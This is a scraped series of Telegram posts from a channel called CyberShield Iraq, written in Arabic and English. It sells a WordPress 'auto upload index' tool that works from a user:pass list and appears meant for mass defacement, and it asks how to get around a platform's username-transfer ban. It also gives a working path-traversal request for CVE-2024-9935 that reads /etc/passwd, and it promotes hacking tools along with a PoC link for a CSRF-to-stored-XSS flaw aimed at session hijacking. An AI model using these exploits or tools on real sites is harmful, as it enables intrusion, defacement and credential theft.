پست‌های تلگرام CyberShield Iraq - الدرع العراقي السيبراني

By using this tool, I raised 4000 indexes last month 😁

Offer for a limited period, if you bring 2 people and they purchase, you will get the tool for free 💣

Discount for an hour, price $20

wordpress auto upload index (يحتاج لسته فيها user:pass)

اندكس خاص فيك
اسم خاص فيك
مفتوحه المصدر
100 اندكس بالدقيقه
السعر 30$ تواصل @HOALI313A

اريد طريقة تتخطى بيها الحضر مال 14 يوم على نقل يوزر 👋

@oorog

soon New project ⚡

🔖 GoogleDorker - أطلق العنان لقوة Google dorking للمتسللين الأخلاقيين من خلال دقة البحث المخصصة.

رابط github

ثغره في احد اضافات وردبريس
رقم ال CVE

CVE-2024-9935

ال exploit

GET /elementor-84/?rtw_generate_pdf=true&rtw_pdf_file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1

#exploit #poc

🔖 SSTImap - أداة الكشف التلقائي عن SSTI مع واجهة تفاعلية

SSTImap هو برنامج اختبار الاختراق الذي يمكنه فحص مواقع الويب بحثًا عن ثغرات حقن الكود وحقن القالب من جانب الخادم واستغلالها، مما يتيح الوصول إلى نظام التشغيل نفسه.
رابط github

This PoC script exploits CVE-2024-39090, a CSRF to Stored XSS vulnerability in PHPGurukul Online Shopping Portal v2.0. It automates CSRF attacks to inject persistent JavaScript payloads, which execute when a privileged user accesses the affected page, enabling actions such as session hijacking or credential theft.

https://github.com/ghostwirez/CVE-2024-39090-PoC